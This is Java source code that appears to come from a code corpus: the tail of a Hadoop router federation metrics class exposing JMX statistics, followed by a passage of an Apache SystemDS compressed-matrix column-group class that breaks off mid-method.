          setStateStoreVersions(innerInfo, stateStoreVersion);
        }
        info.put(record.getPrimaryKey(),
            Collections.unmodifiableMap(innerInfo));
      }
    } catch (IOException e) {
      LOG.error("Cannot get Routers JSON from the State Store", e);
      return "{}";
    }
    return JSON.toString(info);
  }

  /**
   * Populate the map with the State Store versions.
   *
   * @param map Map with the information.
   * @param version State Store versions.
   */
  private static void setStateStoreVersions(
      Map<String, Object> map, StateStoreVersion version) {
    long membershipVersion = version.getMembershipVersion();
    String lastMembershipUpdate = getDateString(membershipVersion);
    map.put("lastMembershipUpdate", lastMembershipUpdate);
    long mountTableVersion = version.getMountTableVersion();
    String lastMountTableDate = getDateString(mountTableVersion);
    map.put("lastMountTableUpdate", lastMountTableDate);
  }

  // Capacity figures aggregated across all nameservices. The long variants can
  // overflow on very large federations; the BigInteger variants cannot.
  @Override
  public long getTotalCapacity() {
    return getNameserviceAggregatedLong(MembershipStats::getTotalSpace);
  }

  @Override
  public long getRemainingCapacity() {
    return getNameserviceAggregatedLong(MembershipStats::getAvailableSpace);
  }

  @Override
  public long getUsedCapacity() {
    return getTotalCapacity() - getRemainingCapacity();
  }

  @Override
  public BigInteger getTotalCapacityBigInt() {
    return getNameserviceAggregatedBigInt(MembershipStats::getTotalSpace);
  }

  @Override
  public BigInteger getRemainingCapacityBigInt() {
    return getNameserviceAggregatedBigInt(MembershipStats::getAvailableSpace);
  }

  @Override
  public long getProvidedSpace() {
    return getNameserviceAggregatedLong(MembershipStats::getProvidedSpace);
  }

  @Override
  public BigInteger getUsedCapacityBigInt() {
    return getTotalCapacityBigInt().subtract(getRemainingCapacityBigInt());
  }

  @Override
  public int getNumNameservices() {
    try {
      Set<FederationNamespaceInfo> nss = namenodeResolver.getNamespaces();
      return nss.size();
    } catch (IOException e) {
      // TODO(review): copy-pasted message — this method counts nameservices,
      // not expired registrations.
      LOG.error(
          "Cannot fetch number of expired registrations from the store: {}",
          e.getMessage());
      return 0;
    }
  }

  @Override
  public int getNumNamenodes() {
    if (membershipStore == null) {
      return 0;
    }
    try {
      GetNamenodeRegistrationsRequest request =
          GetNamenodeRegistrationsRequest.newInstance();
      GetNamenodeRegistrationsResponse response =
          membershipStore.getNamenodeRegistrations(request);
      List<MembershipState> memberships = response.getNamenodeMemberships();
      return memberships.size();
    } catch (IOException e) {
      LOG.error("Cannot retrieve numNamenodes for JMX: {}", e.getMessage());
      return 0;
    }
  }

  @Override
  public int getNumExpiredNamenodes() {
    if (membershipStore == null) {
      return 0;
    }
    try {
      GetNamenodeRegistrationsRequest request =
          GetNamenodeRegistrationsRequest.newInstance();
      GetNamenodeRegistrationsResponse response =
          membershipStore.getExpiredNamenodeRegistrations(request);
      List<MembershipState> expiredMemberships =
          response.getNamenodeMemberships();
      return expiredMemberships.size();
    } catch (IOException e) {
      LOG.error(
          "Cannot retrieve numExpiredNamenodes for JMX: {}", e.getMessage());
      return 0;
    }
  }

  // Datanode counters below are aggregated across all nameservices from the
  // MembershipStats records.
  @Override
  @Metric({"NumLiveNodes", "Number of live data nodes"})
  public int getNumLiveNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfActiveDatanodes);
  }

  @Override
  @Metric({"NumDeadNodes", "Number of dead data nodes"})
  public int getNumDeadNodes() {
    return getNameserviceAggregatedInt(MembershipStats::getNumOfDeadDatanodes);
  }

  @Override
  @Metric({"NumStaleNodes", "Number of stale data nodes"})
  public int getNumStaleNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfStaleDatanodes);
  }

  @Override
  @Metric({"NumDecommissioningNodes", "Number of Decommissioning data nodes"})
  public int getNumDecommissioningNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfDecommissioningDatanodes);
  }

  @Override
  @Metric({"NumDecomLiveNodes", "Number of decommissioned Live data nodes"})
  public int getNumDecomLiveNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfDecomActiveDatanodes);
  }

  @Override
  @Metric({"NumDecomDeadNodes", "Number of decommissioned dead data nodes"})
  public int getNumDecomDeadNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfDecomDeadDatanodes);
  }

  @Override
  @Metric({"NumInMaintenanceLiveDataNodes",
      "Number of IN_MAINTENANCE live data nodes"})
  public int getNumInMaintenanceLiveDataNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfInMaintenanceLiveDataNodes);
  }

  @Override
  @Metric({"NumInMaintenanceDeadDataNodes",
      "Number of IN_MAINTENANCE dead data nodes"})
  public int getNumInMaintenanceDeadDataNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfInMaintenanceDeadDataNodes);
  }

  @Override
  @Metric({"NumEnteringMaintenanceDataNodes",
      "Number of ENTERING_MAINTENANCE data nodes"})
  public int getNumEnteringMaintenanceDataNodes() {
    return getNameserviceAggregatedInt(
        MembershipStats::getNumOfEnteringMaintenanceDataNodes);
  }

  // NOTE(review): method continues beyond the end of this chunk; the catch
  // block below is truncated here.
  @Override // NameNodeMXBean
  public String getNodeUsage() {
    double median = 0;
    double max = 0;
    double min = 0;
    double dev = 0;
    final Map<String, Map<String, Object>> info = new HashMap<>();
    try {
      DatanodeInfo[] live = null;
      if (this.enableGetDNUsage) {
        RouterRpcServer rpcServer = this.router.getRpcServer();
        // Async routers schedule the report and pick up the result with
        // syncReturn(); sync routers block directly.
        if (rpcServer.isAsync()) {
          rpcServer.getDatanodeReportAsync(DatanodeReportType.LIVE, false, timeOut);
          live = syncReturn(DatanodeInfo[].class);
        } else {
          live = rpcServer.getDatanodeReport(DatanodeReportType.LIVE, false, timeOut);
        }
      } else {
        LOG.debug("Getting node usage is disabled.");
      }

      if (live != null && live.length > 0) {
        double[] usages = new double[live.length];
        int i = 0;
        for (DatanodeInfo dn : live) {
          usages[i++] = dn.getDfsUsedPercent();
        }
        Arrays.sort(usages);
        median = usages[usages.length / 2];
        max = usages[usages.length - 1];
        min = usages[0];
        StandardDeviation deviation = new StandardDeviation();
        dev = deviation.evaluate(usages);
      }
    } catch (Exception e) {
      LOG.error("Cannot get the live nodes: {}",
e.getMessage()); } final Map<String, Object> innerInfo = new HashMap<>(); innerInfo.put("min", StringUtils.format("%.2f%%", min)); innerInfo.put("median", StringUtils.format("%.2f%%", median)); innerInfo.put("max", StringUtils.format("%.2f%%", max)); innerInfo.put("stdDev", StringUtils.format("%.2f%%", dev)); info.put("nodeUsage", innerInfo); return JSON.toString(info); } @Override @Metric({"NumBlocks", "Total number of blocks"}) public long getNumBlocks() { return getNameserviceAggregatedLong(MembershipStats::getNumOfBlocks); } @Override @Metric({"NumOfMissingBlocks", "Number of missing blocks"}) public long getNumOfMissingBlocks() { return getNameserviceAggregatedLong(MembershipStats::getNumOfBlocksMissing); } @Override @Metric({"NumOfBlocksPendingReplication", "Number of blocks pending replication"}) public long getNumOfBlocksPendingReplication() { return getNameserviceAggregatedLong( MembershipStats::getNumOfBlocksPendingReplication); } @Override @Metric({"NumOfBlocksUnderReplicated", "Number of blocks under replication"}) public long getNumOfBlocksUnderReplicated() { return getNameserviceAggregatedLong( MembershipStats::getNumOfBlocksUnderReplicated); } @Override @Metric({"NumOfBlocksPendingDeletion", "Number of blocks pending deletion"}) public long getNumOfBlocksPendingDeletion() { return getNameserviceAggregatedLong( MembershipStats::getNumOfBlocksPendingDeletion); } @Override @Metric({"NumFiles", "Number of files"}) public long getNumFiles() { return getNameserviceAggregatedLong(MembershipStats::getNumOfFiles); } @Override public String getRouterStarted() { long startTime = this.router.getStartTime(); return new Date(startTime).toString(); } @Override public String getVersion() { return VersionInfo.getVersion() + ", r" + VersionInfo.getRevision(); } @Override public String getCompiledDate() { return VersionInfo.getDate(); } @Override public String getCompileInfo() { return VersionInfo.getDate() + " by " + VersionInfo.getUser() + " from " + 
VersionInfo.getBranch(); } @Override public String getHostAndPort() { InetSocketAddress address = this.router.getRpcServerAddress(); if (address != null) { try { String hostname = InetAddress.getLocalHost().getHostName(); int port = address.getPort(); return hostname + ":" + port; } catch (UnknownHostException ignored) { } } return "Unknown"; } @Override public String getRouterId() { return this.router.getRouterId(); } @Override public String getClusterId() { try { Collection<String> clusterIds = getNamespaceInfo(FederationNamespaceInfo::getClusterId); return clusterIds.toString(); } catch (IOException e) { LOG.error("Cannot fetch cluster ID metrics: {}", e.getMessage()); return ""; } } @Override public String getBlockPoolId() { try { Collection<String> blockpoolIds = getNamespaceInfo(FederationNamespaceInfo::getBlockPoolId); return blockpoolIds.toString(); } catch (IOException e) { LOG.error("Cannot fetch block pool ID metrics: {}", e.getMessage()); return ""; } } @Override public String getRouterStatus() { return this.router.getRouterState().toString(); } @Override @Metric({"CurrentTokensCount", "Number of router's current tokens"}) public long getCurrentTokensCount() { RouterSecurityManager mgr = this.router.getRpcServer().getRouterSecurityManager(); if (mgr != null && mgr.getSecretManager() != null) { return mgr.getSecretManager().getCurrentTokensSize(); } return -1; } @Override public String getTopTokenRealOwners() { String topTokenRealOwnersString = ""; RouterSecurityManager mgr = this.router.getRpcServer().getRouterSecurityManager(); if (mgr != null && mgr.getSecretManager() != null) { try { List<Metrics2Util.NameValuePair> topOwners = mgr.getSecretManager() .getTopTokenRealOwners(this.topTokenRealOwners); topTokenRealOwnersString = JsonUtil.toJsonString(topOwners); } catch (Exception e) { LOG.error("Unable to fetch the top token real owners as string {}", e.getMessage()); } } return topTokenRealOwnersString; } @Override public boolean isSecurityEnabled() { 
return UserGroupInformation.isSecurityEnabled(); } @Override public int getCorruptFilesCount() { return getNameserviceAggregatedInt(MembershipStats::getCorruptFilesCount); } @Override public long getScheduledReplicationBlocks() { return getNameserviceAggregatedLong( MembershipStats::getScheduledReplicationBlocks); } @Override public long getNumberOfMissingBlocksWithReplicationFactorOne() { return getNameserviceAggregatedLong( MembershipStats::getNumberOfMissingBlocksWithReplicationFactorOne); } @Override public long getHighestPriorityLowRedundancyReplicatedBlocks() { return getNameserviceAggregatedLong( MembershipStats::getHighestPriorityLowRedundancyReplicatedBlocks); } @Override public long getNumberOfBadlyDistributedBlocks() { return getNameserviceAggregatedLong( MembershipStats::getNumberOfBadlyDistributedBlocks); } @Override public long getHighestPriorityLowRedundancyECBlocks() { return getNameserviceAggregatedLong( MembershipStats::getHighestPriorityLowRedundancyECBlocks); } @Override public int getPendingSPSPaths() { return getNameserviceAggregatedInt( MembershipStats::getPendingSPSPaths); } @Override @Metric({"RouterFederationRenameCount", "Number of federation rename"}) public int getRouterFederationRenameCount() { return this.router.getRpcServer().getRouterFederationRenameCount(); } @Override @Metric({"SchedulerJobCount", "Number of scheduler job"}) public int getSchedulerJobCount() { return this.router.getRpcServer().getSchedulerJobCount(); } @Override public String getSafemode() { if (this.router.isRouterState(RouterServiceState.SAFEMODE)) { return "Safe mode is ON. 
" + this.getSafeModeTip(); } else { return ""; } } private String getSafeModeTip() { String cmd = "Use \"hdfs dfsrouteradmin -safemode leave\" " + "to turn safe mode off."; if (this.router.isRouterState(RouterServiceState.INITIALIZING) || this.router.isRouterState(RouterServiceState.UNINITIALIZED)) { return "Router is in" + this.router.getRouterState() + "mode, the router will immediately return to " + "normal mode after some time. " + cmd; } else if (this.router.isRouterState(RouterServiceState.SAFEMODE)) { return "It was turned on manually. " + cmd; } return ""; } /** * Build a set of unique values found in all namespaces. * * @param f Method reference of the appropriate FederationNamespaceInfo * getter function * @return Set of unique string values found in all discovered namespaces. * @throws IOException if the query could not be executed. */ private Collection<String> getNamespaceInfo( Function<FederationNamespaceInfo, String> f) throws IOException { if (membershipStore == null) { return new HashSet<>(); } GetNamespaceInfoRequest request = GetNamespaceInfoRequest.newInstance(); GetNamespaceInfoResponse response = membershipStore.getNamespaceInfo(request); return response.getNamespaceInfo().stream() .map(f) .collect(Collectors.toSet()); } /** * Get the aggregated value for a method for all nameservices. * @param f Method reference * @return Aggregated integer. */ private int getNameserviceAggregatedInt(ToIntFunction<MembershipStats> f) { try { return getActiveNamenodeRegistrations().stream() .map(MembershipState::getStats) .collect(Collectors.summingInt(f)); } catch (IOException e) { LOG.error("Unable to extract metrics: {}", e.getMessage()); return 0; } } /** * Get the aggregated value for a method for all nameservices. * @param f Method reference * @return Aggregated long. 
*/ private long getNameserviceAggregatedLong(ToLongFunction<MembershipStats> f) { try { return getActiveNamenodeRegistrations().stream() .map(MembershipState::getStats) .collect(Collectors.summingLong(f)); } catch (IOException e) { LOG.error("Unable to extract metrics: {}", e.getMessage()); return 0; } } private BigInteger getNameserviceAggregatedBigInt( ToLongFunction<MembershipStats> f) { try { List<MembershipState> states = getActiveNamenodeRegistrations(); BigInteger sum = BigInteger.valueOf(0); for (MembershipState state : states) { long lvalue = f.applyAsLong(state.getStats()); sum = sum.add(BigInteger.valueOf(lvalue)); } return sum; } catch (IOException e) { LOG.error("Unable to extract metrics: {}", e.getMessage()); return new BigInteger("0"); } } /** * Fetches the most active namenode memberships for all known nameservices. * The fetched membership may or may not be active. Excludes expired * memberships. * @throws IOException if the query could not be performed. * @return List of the most active NNs from each known nameservice. */ private List<MembershipState> getActiveNamenodeRegistrations() throws IOException { List<MembershipState> resultList = new ArrayList<>(); if (membershipStore == null) { return resultList; } GetNamespaceInfoRequest request = GetNamespaceInfoRequest.newInstance(); GetNamespaceInfoResponse response = membershipStore.getNamespaceInfo(request); for (FederationNamespaceInfo nsInfo : response.getNamespaceInfo()) { // Fetch the most recent namenode registration String nsId = nsInfo.getNameserviceId(); List<? extends FederationNamenodeContext> nns = namenodeResolver.getNamenodesForNameserviceId(nsId, false); if (nns != null) { FederationNamenodeContext nn = nns.get(0); if (nn instanceof MembershipState) { resultList.add((MembershipState) nn); } } } return resultList; } /** * Get time as a date string. * @param time Seconds since 1970. * @return String representing the date. 
*/ @VisibleForTesting static String getDateString(long time) { if (time <= 0) { return "-"; } Date date = new Date(time); SimpleDateFormat sdf = new SimpleDateFormat(DATE_FORMAT); return sdf.format(date); } /** * Get the number of seconds passed since a date. * * @param timeMs to use as a reference. * @return Seconds since the date. */ private static long getSecondsSince(long timeMs) { if (timeMs < 0) { return -1; } return (now() - timeMs) / 1000; } /** * Get JSON for this record. * * @return Map representing the data for the JSON representation. */ private static Map<String, Object> getJson(BaseRecord record) { Map<String, Object> json = new HashMap<>(); Map<String, Class<?>> fields = getFields(record); for (String fieldName : fields.keySet()) { if (!fieldName.equalsIgnoreCase("proto")) { try { Object value = getField(record, fieldName); if (value instanceof BaseRecord) { BaseRecord recordField = (BaseRecord) value; json.putAll(getJson(recordField)); } else { json.put(fieldName, value == null ? JSONObject.NULL : value); } } catch (Exception e) { throw new IllegalArgumentException( "Cannot serialize field " + fieldName + " into JSON"); } } } return json; } /** * Returns all serializable fields in the object. * * @return Map with the fields. */ private static Map<String, Class<?>> getFields(BaseRecord record) { Map<String, Class<?>> getters = new HashMap<>(); for (Method m : record.getClass().getDeclaredMethods()) { if (m.getName().startsWith("get")) { try { Class<?> type = m.getReturnType(); char[] c = m.getName().substring(3).toCharArray(); c[0] = Character.toLowerCase(c[0]); String key = new String(c); getters.put(key, type); } catch (Exception e) { LOG.error("Cannot execute getter {} on {}", m.getName(), record); } } } return getters; } /** * Fetches the value for a field name. * * @param fieldName the legacy name of the field. * @return The field data or null if not found. 
*/ private static Object getField(BaseRecord record, String fieldName) { Object result = null; Method m = locateGetter(record, fieldName); if (m != null) { try { result = m.invoke(record); } catch (Exception e) { LOG.error("Cannot get field {} on {}", fieldName, record); } } return result; } /** * Finds the appropriate getter for a field name. * * @param fieldName The legacy name of the field. * @return The matching getter or null if not found. */ private static Method locateGetter(BaseRecord record, String fieldName) { for (Method m : record.getClass().getMethods()) { if (m.getName().equalsIgnoreCase("get" + fieldName)) { return m; } } return null; } }
apache/systemds
33,775
src/main/java/org/apache/sysds/runtime/compress/colgroup/ColGroupSDCSingleZeros.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.sysds.runtime.compress.colgroup; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.util.Arrays; import java.util.List; import org.apache.commons.lang3.NotImplementedException; import org.apache.sysds.runtime.compress.CompressedMatrixBlock; import org.apache.sysds.runtime.compress.DMLCompressionException; import org.apache.sysds.runtime.compress.colgroup.ColGroupUtils.P; import org.apache.sysds.runtime.compress.colgroup.dictionary.Dictionary; import org.apache.sysds.runtime.compress.colgroup.dictionary.DictionaryFactory; import org.apache.sysds.runtime.compress.colgroup.dictionary.IDictionary; import org.apache.sysds.runtime.compress.colgroup.dictionary.MatrixBlockDictionary; import org.apache.sysds.runtime.compress.colgroup.dictionary.PlaceHolderDict; import org.apache.sysds.runtime.compress.colgroup.indexes.ColIndexFactory; import org.apache.sysds.runtime.compress.colgroup.indexes.IColIndex; import org.apache.sysds.runtime.compress.colgroup.mapping.MapToZero; import org.apache.sysds.runtime.compress.colgroup.offset.AIterator; import org.apache.sysds.runtime.compress.colgroup.offset.AOffset; import 
org.apache.sysds.runtime.compress.colgroup.offset.AOffset.OffsetSliceInfo; import org.apache.sysds.runtime.compress.colgroup.offset.AOffsetIterator; import org.apache.sysds.runtime.compress.colgroup.offset.OffsetEmpty; import org.apache.sysds.runtime.compress.colgroup.offset.OffsetFactory; import org.apache.sysds.runtime.compress.cost.ComputationCostEstimator; import org.apache.sysds.runtime.compress.estim.encoding.EncodingFactory; import org.apache.sysds.runtime.compress.estim.encoding.IEncode; import org.apache.sysds.runtime.compress.utils.IntArrayList; import org.apache.sysds.runtime.data.DenseBlock; import org.apache.sysds.runtime.data.SparseBlock; import org.apache.sysds.runtime.data.SparseBlockMCSR; import org.apache.sysds.runtime.functionobjects.Builtin; import org.apache.sysds.runtime.matrix.data.MatrixBlock; import org.apache.sysds.runtime.matrix.operators.BinaryOperator; import org.apache.sysds.runtime.matrix.operators.ScalarOperator; import org.apache.sysds.runtime.matrix.operators.UnaryOperator; /** * Column group that sparsely encodes the dictionary values. The idea is that all values is encoded with indexes except * the most common one. the most common one can be inferred by not being included in the indexes. If the values are very * sparse then the most common one is zero. * * This column group is handy in cases where sparse unsafe operations is executed on very sparse columns. Then the zeros * would be materialized in the group without any overhead. 
*/ public class ColGroupSDCSingleZeros extends ASDCZero { private static final long serialVersionUID = 8033235615964315078L; private ColGroupSDCSingleZeros(IColIndex colIndices, int numRows, IDictionary dict, AOffset offsets, int[] cachedCounts) { super(colIndices, numRows, dict, offsets, cachedCounts); if(CompressedMatrixBlock.debug) { if(offsets.getSize() * 2 > numRows + 2 && !(dict instanceof PlaceHolderDict)) throw new DMLCompressionException("Wrong direction of SDCSingleZero compression should be other way " + numRows + " vs " + _indexes + "\n" + this); _indexes.verify(_indexes.getSize()); } } public static AColGroup create(IColIndex colIndices, int numRows, IDictionary dict, AOffset offsets, int[] cachedCounts) { if(dict == null || offsets instanceof OffsetEmpty) return new ColGroupEmpty(colIndices); else if(offsets.getSize() * 2 > numRows + 2 && !(dict instanceof PlaceHolderDict)) { AOffset rev = offsets.reverse(numRows); IDictionary empty = MatrixBlockDictionary.create(new MatrixBlock(1, colIndices.size(), true)); return ColGroupSDCSingle.create(colIndices, numRows, empty, dict.getValues(), rev, null); } else return new ColGroupSDCSingleZeros(colIndices, numRows, dict, offsets, cachedCounts); } @Override public CompressionType getCompType() { return CompressionType.SDC; } @Override public ColGroupType getColGroupType() { return ColGroupType.SDCSingleZeros; } @Override protected void decompressToDenseBlockDenseDictionary(DenseBlock db, int rl, int ru, int offR, int offC, double[] values) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() >= ru) return; // _indexes.cacheIterator(it, ru); else { decompressToDenseBlockDenseDictionaryWithProvidedIterator(db, rl, ru, offR, offC, values, it); // _indexes.cacheIterator(it, ru); } } @Override public void decompressToDenseBlockDenseDictionaryWithProvidedIterator(DenseBlock db, int rl, int ru, int offR, int offC, double[] values, AIterator it) { final int last = 
_indexes.getOffsetToLast(); if(it == null || it.value() >= ru || rl > last) return; else if(ru > _indexes.getOffsetToLast()) decompressToDenseBlockDenseDictionaryPost(db, rl, ru, offR, offC, values, it); else { if(_colIndexes.size() == 1 && db.getDim(1) == 1) decompressToDenseBlockDenseDictionaryPreSingleColOutContiguous(db, rl, ru, offR, offC, values[0], it); else decompressToDenseBlockDenseDictionaryPre(db, rl, ru, offR, offC, values, it); } } private void decompressToDenseBlockDenseDictionaryPost(DenseBlock db, int rl, int ru, int offR, int offC, double[] values, AIterator it) { final int maxOff = _indexes.getOffsetToLast(); final int nCol = _colIndexes.size(); int row = offR + it.value(); double[] c = db.values(row); int off = db.pos(row); for(int j = 0; j < nCol; j++) c[off + _colIndexes.get(j) + offC] += values[j]; while(it.value() < maxOff) { it.next(); row = offR + it.value(); c = db.values(row); off = db.pos(row); for(int j = 0; j < nCol; j++) c[off + _colIndexes.get(j) + offC] += values[j]; } } private void decompressToDenseBlockDenseDictionaryPreSingleColOutContiguous(DenseBlock db, int rl, int ru, int offR, int offC, double v, AIterator it) { final double[] c = db.values(0); int r = it.value(); while(r < ru) { c[offR + r] += v; r = it.next(); } } private void decompressToDenseBlockDenseDictionaryPre(DenseBlock db, int rl, int ru, int offR, int offC, double[] values, AIterator it) { final int nCol = _colIndexes.size(); int r = it.value(); while(r < ru) { final int row = offR + r; final double[] c = db.values(row); final int off = db.pos(row); for(int j = 0; j < nCol; j++) c[off + _colIndexes.get(j) + offC] += values[j]; r = it.next(); } } @Override protected void decompressToDenseBlockSparseDictionary(DenseBlock db, int rl, int ru, int offR, int offC, SparseBlock sb) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() >= ru) _indexes.cacheIterator(it, ru); final int last = _indexes.getOffsetToLast(); if(ru > last) 
decompressToDenseBlockSparseDictionaryPost(db, rl, ru, offR, offC, sb, it, last); else decompressToDenseBlockSparseDictionaryPre(db, rl, ru, offR, offC, sb, it); } private final void decompressToDenseBlockSparseDictionaryPost(DenseBlock db, int rl, int ru, int offR, int offC, SparseBlock sb, AIterator it, int last) { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final double[] avals = sb.values(0); final int[] aix = sb.indexes(0); while(true) { final int idx = offR + it.value(); final double[] c = db.values(idx); final int off = db.pos(idx) + offC; for(int j = apos; j < alen; j++) c[off + _colIndexes.get(aix[j])] += avals[j]; if(it.value() == last) return; it.next(); } } private final void decompressToDenseBlockSparseDictionaryPre(DenseBlock db, int rl, int ru, int offR, int offC, SparseBlock sb, AIterator it) { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final int[] aix = sb.indexes(0); final double[] avals = sb.values(0); while(it.isNotOver(ru)) { final int row = offR + it.value(); final double[] c = db.values(row); final int off = db.pos(row); for(int j = apos; j < alen; j++) c[off + _colIndexes.get(aix[j]) + offC] += avals[j]; it.next(); } _indexes.cacheIterator(it, ru); } @Override protected void decompressToSparseBlockSparseDictionary(SparseBlock ret, int rl, int ru, int offR, int offC, SparseBlock sb) { final AIterator it = _indexes.getIterator(rl); final int last = _indexes.getOffsetToLast(); if(it == null) return; else if(it.value() >= ru) _indexes.cacheIterator(it, ru); else if(ru > last) { final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final int[] aix = sb.indexes(0); final double[] avals = sb.values(0); while(it.value() < last) { final int row = offR + it.value(); for(int j = apos; j < alen; j++) ret.append(row, _colIndexes.get(aix[j]) + offC, avals[j]); it.next(); } final int row = offR + it.value(); for(int j = apos; j < alen; j++) ret.append(row, _colIndexes.get(aix[j]) + offC, avals[j]); } else 
{ final int apos = sb.pos(0); final int alen = sb.size(0) + apos; final int[] aix = sb.indexes(0); final double[] avals = sb.values(0); while(it.isNotOver(ru)) { final int row = offR + it.value(); for(int j = apos; j < alen; j++) ret.append(row, _colIndexes.get(aix[j]) + offC, avals[j]); it.next(); } _indexes.cacheIterator(it, ru); } } @Override protected void decompressToSparseBlockDenseDictionary(SparseBlock ret, int rl, int ru, int offR, int offC, double[] values) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() >= ru) _indexes.cacheIterator(it, ru); else if(ru > _indexes.getOffsetToLast()) { final int nCol = _colIndexes.size(); final int lastOff = _indexes.getOffsetToLast(); int row = offR + it.value(); for(int j = 0; j < nCol; j++) ret.append(row, _colIndexes.get(j) + offC, values[j]); while(it.value() < lastOff) { it.next(); row = offR + it.value(); for(int j = 0; j < nCol; j++) ret.append(row, _colIndexes.get(j) + offC, values[j]); } } else { final int nCol = _colIndexes.size(); while(it.isNotOver(ru)) { final int row = offR + it.value(); for(int j = 0; j < nCol; j++) ret.append(row, _colIndexes.get(j) + offC, values[j]); it.next(); } _indexes.cacheIterator(it, ru); } } @Override public double getIdx(int r, int colIdx) { final AIterator it = _indexes.getIterator(r); if(it == null || it.value() != r) return 0; return _dict.getValue(colIdx); } @Override protected void computeRowSums(double[] c, int rl, int ru, double[] preAgg) { computeRowSum(c, rl, ru, preAgg[0]); } protected void computeRowSum(double[] c, int rl, int ru, double def) { final AIterator it = _indexes.getIterator(rl); if(it == null) return; else if(it.value() > ru) _indexes.cacheIterator(it, ru); else if(ru > _indexes.getOffsetToLast()) { final int maxOff = _indexes.getOffsetToLast(); while(true) { c[it.value()] += def; if(it.value() == maxOff) break; it.next(); } } else { while(it.isNotOver(ru)) { c[it.value()] += def; it.next(); } 
_indexes.cacheIterator(it, ru); } } @Override protected void computeRowMxx(double[] c, Builtin builtin, int rl, int ru, double[] preAgg) { ColGroupSDCSingle.computeRowMxx(c, builtin, rl, ru, _indexes, _numRows, 0, preAgg[0]); } @Override protected void computeRowProduct(double[] c, int rl, int ru, double[] preAgg) { ColGroupSDCSingle.computeRowProduct(c, rl, ru, _indexes, _numRows, 0, preAgg[0]); } @Override public int[] getCounts(int[] counts) { counts[0] = _indexes.getSize(); return counts; } @Override protected void multiplyScalar(double v, double[] resV, int offRet, AIterator it) { _dict.multiplyScalar(v, resV, offRet, 0, _colIndexes); } @Override public void preAggregateDense(MatrixBlock m, double[] preAgg, int rl, int ru, int cl, int cu) { if(m.getDenseBlock().isContiguous()) preAggregateDenseContiguous(m, preAgg, rl, ru, cl, cu); else preAggregateDenseGeneric(m, preAgg, rl, ru, cl, cu); } @Override public void leftMMIdentityPreAggregateDense(MatrixBlock that, MatrixBlock ret, int rl, int ru, int cl, int cu) { throw new NotImplementedException(); } private void preAggregateDenseGeneric(MatrixBlock m, double[] preAgg, int rl, int ru, int cl, int cu) { final AIterator it = _indexes.getIterator(cl); final DenseBlock db = m.getDenseBlock(); final int nCol = m.getNumColumns(); if(it == null) return; else if(it.value() > cu) _indexes.cacheIterator(it, cu); else if(cu < _indexes.getOffsetToLast() + 1) { if(db.isContiguous(rl, ru)) { while(it.value() < cu) { final double[] vals = db.values(rl); final int start = it.value() + db.pos(rl); final int end = it.value() + db.pos(ru); for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; it.next(); } } else { throw new NotImplementedException(); } _indexes.cacheIterator(it, cu); } else { if(db.isContiguous(rl, ru)) { final double[] vals = db.values(rl); final int rlPos = db.pos(rl); final int ruPos = db.pos(ru); int of = it.value(); int start = of + rlPos; int end = of + ruPos; 
for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; while(of < _indexes.getOffsetToLast()) { it.next(); of = it.value(); start = of + rlPos; end = of + ruPos; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; } } else { throw new NotImplementedException(); } } } private void preAggregateDenseContiguous(MatrixBlock m, double[] preAgg, int rl, int ru, int cl, int cu) { final AIterator it = _indexes.getIterator(cl); final double[] vals = m.getDenseBlockValues(); final int nCol = m.getNumColumns(); if(it == null) return; else if(it.value() > cu) _indexes.cacheIterator(it, cu); else if(cu < _indexes.getOffsetToLast() + 1) { while(it.value() < cu) { final int start = it.value() + nCol * rl; final int end = it.value() + nCol * ru; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; it.next(); } _indexes.cacheIterator(it, cu); } else { int of = it.value(); int start = of + nCol * rl; int end = of + nCol * ru; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; while(of < _indexes.getOffsetToLast()) { it.next(); of = it.value(); start = of + nCol * rl; end = of + nCol * ru; for(int offOut = 0, off = start; off < end; offOut++, off += nCol) preAgg[offOut] += vals[off]; } } } @Override public void preAggregateSparse(SparseBlock sb, double[] preAgg, int rl, int ru, int cl, int cu) { if(cl != 0 || cu < _indexes.getOffsetToLast()) { throw new NotImplementedException(); } final AOffsetIterator it = _indexes.getOffsetIterator(); if(rl == ru - 1) preAggregateSparseSingleRow(sb, preAgg, rl, _indexes.getOffsetToLast(), it); else preAggregateSparseMultiRow(sb, preAgg, rl, ru, _indexes.getOffsetToLast(), it); } private static void preAggregateSparseSingleRow(final SparseBlock sb, final double[] preAgg, final int r, final int last, final AOffsetIterator it) { if(sb.isEmpty(r)) return; final int apos = sb.pos(r); 
